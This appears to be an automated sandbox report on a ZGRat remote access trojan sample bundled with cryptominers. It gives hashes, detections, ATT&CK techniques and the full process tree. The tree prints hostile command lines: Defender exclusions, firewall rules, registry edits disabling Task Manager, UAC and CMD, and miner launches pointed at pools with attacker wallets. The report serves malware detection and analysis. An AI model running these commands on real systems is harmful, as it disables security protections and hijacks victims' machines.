zgrat | 8cd6382a91cf1f0d691f54178ec66897f69f2091f0f0d9ad6afd68951bffd271

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
28/02/2024, 00:42

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

aa913188cbf14c18b50a9b546525fcbe.exe
Size

8.4MB
MD5

aa913188cbf14c18b50a9b546525fcbe
SHA1

a4c7a4b090f013800cfe39a69312e78bba6814ee
SHA256

8cd6382a91cf1f0d691f54178ec66897f69f2091f0f0d9ad6afd68951bffd271
SHA512

eb3926392c3c650703a63f1aefc7a163cd7c6c0b126da311bc20f105f98dcc0287a48b6c65de505003f836b26a15c7b81d71eaad3b10188c112f39df1ed99d5a
SSDEEP

196608:0jXi07LQczcygmpv4yrw15L33NohvUz/F9XriPdWRcADG98vEPsSUwaeoNOpmW8l:0jSSccW91B3uhUz/F9X+PAb69MfS9U

Score

10^/10

zgrat evasion persistence rat

Malware Config

Signatures

Detect ZGRat V1 33 IoCs

resource	yara_rule
behavioral2/memory/4496-332-0x000000001E480000-0x000000001E4E9000-memory.dmp	family_zgrat_v1
behavioral2/memory/4496-334-0x000000001E480000-0x000000001E4E9000-memory.dmp	family_zgrat_v1
behavioral2/memory/4148-336-0x000000001DC00000-0x000000001DC7A000-memory.dmp	family_zgrat_v1
behavioral2/memory/4496-338-0x000000001E480000-0x000000001E4E9000-memory.dmp	family_zgrat_v1
behavioral2/memory/4148-337-0x000000001DC00000-0x000000001DC7A000-memory.dmp	family_zgrat_v1
behavioral2/memory/4496-342-0x000000001E480000-0x000000001E4E9000-memory.dmp	family_zgrat_v1
behavioral2/memory/4148-341-0x000000001DC00000-0x000000001DC7A000-memory.dmp	family_zgrat_v1
behavioral2/memory/4496-346-0x000000001E480000-0x000000001E4E9000-memory.dmp	family_zgrat_v1
behavioral2/memory/4148-345-0x000000001DC00000-0x000000001DC7A000-memory.dmp	family_zgrat_v1
behavioral2/memory/4148-349-0x000000001DC00000-0x000000001DC7A000-memory.dmp	family_zgrat_v1
behavioral2/memory/4148-353-0x000000001DC00000-0x000000001DC7A000-memory.dmp	family_zgrat_v1
behavioral2/memory/4496-354-0x000000001E480000-0x000000001E4E9000-memory.dmp	family_zgrat_v1
behavioral2/memory/4496-350-0x000000001E480000-0x000000001E4E9000-memory.dmp	family_zgrat_v1
behavioral2/memory/4148-357-0x000000001DC00000-0x000000001DC7A000-memory.dmp	family_zgrat_v1
behavioral2/memory/4496-358-0x000000001E480000-0x000000001E4E9000-memory.dmp	family_zgrat_v1
behavioral2/memory/4148-360-0x000000001DC00000-0x000000001DC7A000-memory.dmp	family_zgrat_v1
behavioral2/memory/4148-363-0x000000001DC00000-0x000000001DC7A000-memory.dmp	family_zgrat_v1
behavioral2/memory/4496-364-0x000000001E480000-0x000000001E4E9000-memory.dmp	family_zgrat_v1
behavioral2/memory/4148-368-0x000000001DC00000-0x000000001DC7A000-memory.dmp	family_zgrat_v1
behavioral2/memory/4496-367-0x000000001E480000-0x000000001E4E9000-memory.dmp	family_zgrat_v1
behavioral2/memory/4148-372-0x000000001DC00000-0x000000001DC7A000-memory.dmp	family_zgrat_v1
behavioral2/memory/4496-371-0x000000001E480000-0x000000001E4E9000-memory.dmp	family_zgrat_v1
behavioral2/memory/4496-378-0x000000001E480000-0x000000001E4E9000-memory.dmp	family_zgrat_v1
behavioral2/memory/4148-377-0x000000001DC00000-0x000000001DC7A000-memory.dmp	family_zgrat_v1
behavioral2/memory/4148-381-0x000000001DC00000-0x000000001DC7A000-memory.dmp	family_zgrat_v1
behavioral2/memory/4496-382-0x000000001E480000-0x000000001E4E9000-memory.dmp	family_zgrat_v1
behavioral2/memory/4148-384-0x000000001DC00000-0x000000001DC7A000-memory.dmp	family_zgrat_v1
behavioral2/memory/4496-387-0x000000001E480000-0x000000001E4E9000-memory.dmp	family_zgrat_v1
behavioral2/memory/4148-388-0x000000001DC00000-0x000000001DC7A000-memory.dmp	family_zgrat_v1
behavioral2/memory/4496-391-0x000000001E480000-0x000000001E4E9000-memory.dmp	family_zgrat_v1
behavioral2/memory/4148-392-0x000000001DC00000-0x000000001DC7A000-memory.dmp	family_zgrat_v1
behavioral2/memory/4496-395-0x000000001E480000-0x000000001E4E9000-memory.dmp	family_zgrat_v1
behavioral2/memory/4148-396-0x000000001DC00000-0x000000001DC7A000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Disables Task Manager via registry modification
evasion

Modifies Windows Firewall 2 TTPs 8 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4740	netsh.exe
5024	netsh.exe
2052	netsh.exe
1996	netsh.exe
5096	netsh.exe
2500	netsh.exe
4296	netsh.exe
4064	netsh.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2408	attrib.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	aa913188cbf14c18b50a9b546525fcbe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	desktop.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	Chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	process.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\setup.exe	setup.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\setup.exe	setup.exe

Executes dropped EXE 11 IoCs

pid	Process
4112	desktop.exe
4092	setup.exe
4148	process.exe
4496	Chrome.exe
4104	Chrome.exe
4468	Chrome.exe
5116	Chrome.exe
2928	Chrome.exe
1376	Chrome.exe
2724	Chrome.exe
3900	process.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\setup = "C:\\Users\\Admin\\AppData\\Roaming\\setup.exe"	setup.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4496 set thread context of 2724	4496	Chrome.exe	133
PID 4148 set thread context of 3900	4148	process.exe	137

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings	Chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings	process.exe
Key created	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings	desktop.exe

Suspicious behavior: EnumeratesProcesses 40 IoCs

pid	Process
2500	powershell.exe
2500	powershell.exe
2708	powershell.exe
2708	powershell.exe
2708	powershell.exe
1276	powershell.exe
1276	powershell.exe
1276	powershell.exe
8	powershell.exe
8	powershell.exe
4800	powershell.exe
4800	powershell.exe
4600	powershell.exe
4600	powershell.exe
4132	powershell.exe
4132	powershell.exe
1368	powershell.exe
1368	powershell.exe
888	powershell.exe
888	powershell.exe
1504	powershell.exe
1504	powershell.exe
4496	Chrome.exe
4496	Chrome.exe
4496	Chrome.exe
4496	Chrome.exe
4496	Chrome.exe
4496	Chrome.exe
4496	Chrome.exe
4496	Chrome.exe
4496	Chrome.exe
4496	Chrome.exe
4496	Chrome.exe
4496	Chrome.exe
2684	powershell.exe
2684	powershell.exe
4148	process.exe
4148	process.exe
2380	powershell.exe
2380	powershell.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	2708	powershell.exe
Token: SeDebugPrivilege	1276	powershell.exe
Token: SeDebugPrivilege	8	powershell.exe
Token: SeDebugPrivilege	4800	powershell.exe
Token: SeDebugPrivilege	4600	powershell.exe
Token: SeDebugPrivilege	4132	powershell.exe
Token: SeDebugPrivilege	1368	powershell.exe
Token: SeDebugPrivilege	888	powershell.exe
Token: SeDebugPrivilege	1504	powershell.exe
Token: SeDebugPrivilege	4496	Chrome.exe
Token: SeDebugPrivilege	4148	process.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeLockMemoryPrivilege	2724	Chrome.exe
Token: SeLockMemoryPrivilege	2724	Chrome.exe
Token: SeDebugPrivilege	2380	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3912 wrote to memory of 4112	3912	aa913188cbf14c18b50a9b546525fcbe.exe	90
PID 3912 wrote to memory of 4112	3912	aa913188cbf14c18b50a9b546525fcbe.exe	90
PID 3912 wrote to memory of 4112	3912	aa913188cbf14c18b50a9b546525fcbe.exe	90
PID 3912 wrote to memory of 4092	3912	aa913188cbf14c18b50a9b546525fcbe.exe	92
PID 3912 wrote to memory of 4092	3912	aa913188cbf14c18b50a9b546525fcbe.exe	92
PID 3912 wrote to memory of 4148	3912	aa913188cbf14c18b50a9b546525fcbe.exe	93
PID 3912 wrote to memory of 4148	3912	aa913188cbf14c18b50a9b546525fcbe.exe	93
PID 3912 wrote to memory of 4496	3912	aa913188cbf14c18b50a9b546525fcbe.exe	94
PID 3912 wrote to memory of 4496	3912	aa913188cbf14c18b50a9b546525fcbe.exe	94
PID 4112 wrote to memory of 1668	4112	desktop.exe	95
PID 4112 wrote to memory of 1668	4112	desktop.exe	95
PID 4112 wrote to memory of 1668	4112	desktop.exe	95
PID 1668 wrote to memory of 5116	1668	WScript.exe	99
PID 1668 wrote to memory of 5116	1668	WScript.exe	99
PID 1668 wrote to memory of 5116	1668	WScript.exe	99
PID 5116 wrote to memory of 2408	5116	cmd.exe	97
PID 5116 wrote to memory of 2408	5116	cmd.exe	97
PID 5116 wrote to memory of 2408	5116	cmd.exe	97
PID 5116 wrote to memory of 2500	5116	cmd.exe	98
PID 5116 wrote to memory of 2500	5116	cmd.exe	98
PID 5116 wrote to memory of 2500	5116	cmd.exe	98
PID 5116 wrote to memory of 2708	5116	cmd.exe	102
PID 5116 wrote to memory of 2708	5116	cmd.exe	102
PID 5116 wrote to memory of 2708	5116	cmd.exe	102
PID 5116 wrote to memory of 1276	5116	cmd.exe	103
PID 5116 wrote to memory of 1276	5116	cmd.exe	103
PID 5116 wrote to memory of 1276	5116	cmd.exe	103
PID 5116 wrote to memory of 8	5116	cmd.exe	104
PID 5116 wrote to memory of 8	5116	cmd.exe	104
PID 5116 wrote to memory of 8	5116	cmd.exe	104
PID 5116 wrote to memory of 4800	5116	cmd.exe	105
PID 5116 wrote to memory of 4800	5116	cmd.exe	105
PID 5116 wrote to memory of 4800	5116	cmd.exe	105
PID 5116 wrote to memory of 4600	5116	cmd.exe	106
PID 5116 wrote to memory of 4600	5116	cmd.exe	106
PID 5116 wrote to memory of 4600	5116	cmd.exe	106
PID 5116 wrote to memory of 4132	5116	cmd.exe	107
PID 5116 wrote to memory of 4132	5116	cmd.exe	107
PID 5116 wrote to memory of 4132	5116	cmd.exe	107
PID 5116 wrote to memory of 1368	5116	cmd.exe	108
PID 5116 wrote to memory of 1368	5116	cmd.exe	108
PID 5116 wrote to memory of 1368	5116	cmd.exe	108
PID 5116 wrote to memory of 888	5116	cmd.exe	109
PID 5116 wrote to memory of 888	5116	cmd.exe	109
PID 5116 wrote to memory of 888	5116	cmd.exe	109
PID 5116 wrote to memory of 1504	5116	cmd.exe	110
PID 5116 wrote to memory of 1504	5116	cmd.exe	110
PID 5116 wrote to memory of 1504	5116	cmd.exe	110
PID 5116 wrote to memory of 1996	5116	cmd.exe	113
PID 5116 wrote to memory of 1996	5116	cmd.exe	113
PID 5116 wrote to memory of 1996	5116	cmd.exe	113
PID 5116 wrote to memory of 5096	5116	cmd.exe	115
PID 5116 wrote to memory of 5096	5116	cmd.exe	115
PID 5116 wrote to memory of 5096	5116	cmd.exe	115
PID 5116 wrote to memory of 2500	5116	cmd.exe	116
PID 5116 wrote to memory of 2500	5116	cmd.exe	116
PID 5116 wrote to memory of 2500	5116	cmd.exe	116
PID 5116 wrote to memory of 4296	5116	cmd.exe	117
PID 5116 wrote to memory of 4296	5116	cmd.exe	117
PID 5116 wrote to memory of 4296	5116	cmd.exe	117
PID 5116 wrote to memory of 4064	5116	cmd.exe	118
PID 5116 wrote to memory of 4064	5116	cmd.exe	118
PID 5116 wrote to memory of 4064	5116	cmd.exe	118
PID 5116 wrote to memory of 4740	5116	cmd.exe	119

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2408	attrib.exe

C:\Users\Admin\AppData\Local\Temp\aa913188cbf14c18b50a9b546525fcbe.exe
"C:\Users\Admin\AppData\Local\Temp\aa913188cbf14c18b50a9b546525fcbe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3912
- C:\ProgramData\Drivers\desktop.exe
  "C:\ProgramData\Drivers\desktop.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4112
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\process.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:1668
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\run.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5116
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "process.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2708
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "desktop.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1276
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "download.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:8
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "setup.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4800
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "loader.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4600
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "Chrome.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4132
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "wscript.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1368
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "process.vbs"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:888
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess "run.bat"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1504
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\\ProgramData\\Drivers\\process.exe" Windows enable
        5⤵
        Modifies Windows Firewall
        
        PID:1996
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\\ProgramData\\Drivers\\run.bat" Windows enable
        5⤵
        Modifies Windows Firewall
        
        PID:5096
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\\ProgramData\\Drivers\\Chrome.exe" Windows enable
        5⤵
        Modifies Windows Firewall
        
        PID:2500
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\\ProgramData\\Drivers\\loader.exe" Windows enable
        5⤵
        Modifies Windows Firewall
        
        PID:4296
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\\ProgramData\\Drivers\\setup.exe" Windows enable
        5⤵
        Modifies Windows Firewall
        
        PID:4064
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\\ProgramData\\Drivers\\run.bat" Windows enable
        5⤵
        Modifies Windows Firewall
        
        PID:4740
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\\ProgramData\\Drivers\\process.vbs" Windows enable
        5⤵
        Modifies Windows Firewall
        
        PID:5024
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\\ProgramData\\Drivers\\desktop.exe" Windows enable
        5⤵
        Modifies Windows Firewall
        
        PID:2052
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\SOFTWARE\Policies\Microsoft\Windows\System"
        5⤵
        
        PID:2100
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_SZ /d 1
        5⤵
        
        PID:3200
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLK\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0
        5⤵
        
        PID:4396
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKCU\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2
        5⤵
        
        PID:4416
- C:\ProgramData\Drivers\setup.exe
  "C:\ProgramData\Drivers\setup.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  PID:4092
- C:\ProgramData\Drivers\process.exe
  "C:\ProgramData\Drivers\process.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4148
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Ameylvsm.vbs"
    3⤵
    - Checks computer location settings
    PID:4376
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WindowsProcess\windef.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2380
- - C:\Users\Admin\AppData\Local\Temp\process.exe
    C:\Users\Admin\AppData\Local\Temp\process.exe --algo ETCHASH --pool etchash.unmineable.com:3333 --user RVN:RMzqXumjUkbMmPQRNJT1prdGLBifgFgFXv.RATARIA --ethstratum ETHPROXY
    3⤵
    - Executes dropped EXE
    PID:3900
- C:\ProgramData\Drivers\Chrome.exe
  "C:\ProgramData\Drivers\Chrome.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4496
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Iiimxlbvhldknlde.vbs"
    3⤵
    - Checks computer location settings
    PID:4784
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WindowsProcess\Defender.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2684
- - C:\Users\Admin\AppData\Local\Temp\Chrome.exe
    C:\Users\Admin\AppData\Local\Temp\Chrome.exe --donate-level 5 --cpu-max-threads-hint=25 -o pool.supportxmr.com:3333 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k -p RATARIA
    3⤵
    - Executes dropped EXE
    PID:4104
- - C:\Users\Admin\AppData\Local\Temp\Chrome.exe
    C:\Users\Admin\AppData\Local\Temp\Chrome.exe --donate-level 5 --cpu-max-threads-hint=25 -o pool.supportxmr.com:3333 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k -p RATARIA
    3⤵
    - Executes dropped EXE
    PID:5116
- - C:\Users\Admin\AppData\Local\Temp\Chrome.exe
    C:\Users\Admin\AppData\Local\Temp\Chrome.exe --donate-level 5 --cpu-max-threads-hint=25 -o pool.supportxmr.com:3333 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k -p RATARIA
    3⤵
    - Executes dropped EXE
    PID:4468
- - C:\Users\Admin\AppData\Local\Temp\Chrome.exe
    C:\Users\Admin\AppData\Local\Temp\Chrome.exe --donate-level 5 --cpu-max-threads-hint=25 -o pool.supportxmr.com:3333 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k -p RATARIA
    3⤵
    - Executes dropped EXE
    PID:2928
- - C:\Users\Admin\AppData\Local\Temp\Chrome.exe
    C:\Users\Admin\AppData\Local\Temp\Chrome.exe --donate-level 5 --cpu-max-threads-hint=25 -o pool.supportxmr.com:3333 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k -p RATARIA
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2724
- - C:\Users\Admin\AppData\Local\Temp\Chrome.exe
    C:\Users\Admin\AppData\Local\Temp\Chrome.exe --donate-level 5 --cpu-max-threads-hint=25 -o pool.supportxmr.com:3333 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k -p RATARIA
    3⤵
    - Executes dropped EXE
    PID:1376

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\ProgramData\Drivers"
1⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2408

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Drivers"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Drivers\Chrome.exe

Filesize
1024KB

MD5
39e836095347124661d709c9e3a5e8f6

SHA1
e35f8371b9e9e0982aebd9031e875fd1f35a125a

SHA256
80cafbb25b58f590de448fcd57f380f10d2f959d00219f0f7a12ba281d8ba96f

SHA512
a329f5044dbc942bea4f375da2c1fe6e8fddf1b94d474df2f20be730d475171f51b7893a33797e603e3ce0d89c35e69dd3493f6031369e16c40925a3c6352c7d

Download Submit
C:\ProgramData\Drivers\Chrome.exe

Filesize
896KB

MD5
188551f4d9f4e4ca7c98464432a0633b

SHA1
b15ecba9405b0d9ab9faa72fcddb9664d2e560be

SHA256
75bd19ede19aa6dccfa0a04c58980ec54f615c65f6932565631d38f629cbc1be

SHA512
991d09e0362c30ad386d6c03b19f8564a26274c52d5ec73fe30ca99e1a21540d6be75efe8fac3fead0e42b121face71439b9cbd4dd926b42cc632b34a3c9f219

Download Submit
C:\ProgramData\Drivers\Chrome.exe

Filesize
3.3MB

MD5
c61dd07671ef9c1544bcabff1eaefa06

SHA1
0367f5ed364018377c4bbcb4983f5db4cd1598e7

SHA256
a3ab37cd54163c31540b1e9b833a55d8cccbf8f77a4a00baf92522c6aea64516

SHA512
c67fa19c4d2139c82cc7e28dcd866a83bbf8c38df6a7fada919b0a370e1d7763362b229673819a472b92126d9099375b0e1e272fc2a3908ddfda165b28f25a10

Download Submit
C:\ProgramData\Drivers\desktop.exe

Filesize
310KB

MD5
70937689b6f52f4b66c6735206b05880

SHA1
a8fb309d48f5ec3a5eacdf550bd978212940711d

SHA256
91669d0a10e671ec1fefb54b0aadc56fb944ff6325c373ba5dc0011a186803cc

SHA512
8e6d2edf9f1c53bbe1ebe3c3a4a8ac7e50819ec9e0769fd29532ed660d54a33be2bad85f105a8a23c643786140ab5601a8d73909bd5a9e82cf1a1fe6184bceb5

Download Submit
C:\ProgramData\Drivers\process.exe

Filesize
1.8MB

MD5
5c27b8156a183786a3eb395c930c9e00

SHA1
d6c50167d9781e370b5f8250603d2b579115a295

SHA256
e9df63018ad044caf8cdde3e21eb4f26666a579663636c804b84905582a313ab

SHA512
13579d9fb0f3c34313fcbf773986d4757da0d90878a0ab8711dbb3e27eb08503141601d21c8ee6f0522de27bca61e22084afa1b2e77f352400ba1a5108f26cce

Download Submit
C:\ProgramData\Drivers\process.exe

Filesize
448KB

MD5
307fd3785ce77ad6ac2f6a3701aed1c3

SHA1
f04b11a896889956de3986c40f54995c9d6dd483

SHA256
2bc94ccf56ca1b61d9e5271311819d041d714249bd557463ff6c736496385718

SHA512
3aec3987c6dd525298793d14131b891c45924afae07af31cfa9412f9cd6c5c4adbbec0801b441cbb6206f77163c4184c8d18ddca6a1f4c6c0644951cba147bee

Download Submit
C:\ProgramData\Drivers\process.exe

Filesize
320KB

MD5
8ee81f09966b12ad1134f7a8a4a9f194

SHA1
da40d36def216ff6885f6ebef23759b9ff5078da

SHA256
867d797d31e2533409c5a04e67bc1b7ec4cedcc998192747b4b88099ec17922a

SHA512
05ed900458f9e57b6875cad4da662eaf6a332560b1c6adc5f21932013b1cd148aa6d0d24cf99f675a52d7bcd7a223f6a9579acb2675b91ba9df7439ef4cb9fe5

Download Submit
C:\ProgramData\Drivers\process.vbs

Filesize
85B

MD5
a5777f481dbeb1c17d5952f6d095f013

SHA1
3dbed835a5318aa1dd7bb97ec97f83df16d5edb3

SHA256
1d8a8c43df987cea07eaf1c282c6dbc70f31bbec4c14cd66a886fdd7298474d9

SHA512
b8ed0f7535049fb76cefdfdf93b361709ab721d25690bce0b60afc90eade293c308fa5d4cd52d0042f52be89480830ddc4edf7962ead060040adef9c0b8bcf3e

Download Submit
C:\ProgramData\Drivers\run.bat

Filesize
2KB

MD5
65c34cb26a12d07bdb1e96afce8834cf

SHA1
f4a91fdb3d9234c9194c4672a1adce57fd985399

SHA256
c71c52beb77ad75e63a52cb0b12a587e330f29fcffe7766beb60096b1ef880c7

SHA512
af6365b6020393a2b2f69cc26f9ca300190d2195fc7529d701640985dc8be3c4802b6d18dcae627eec3a7d15a2913322217e73002332d8979825e4a0a6c0d27b

Download Submit
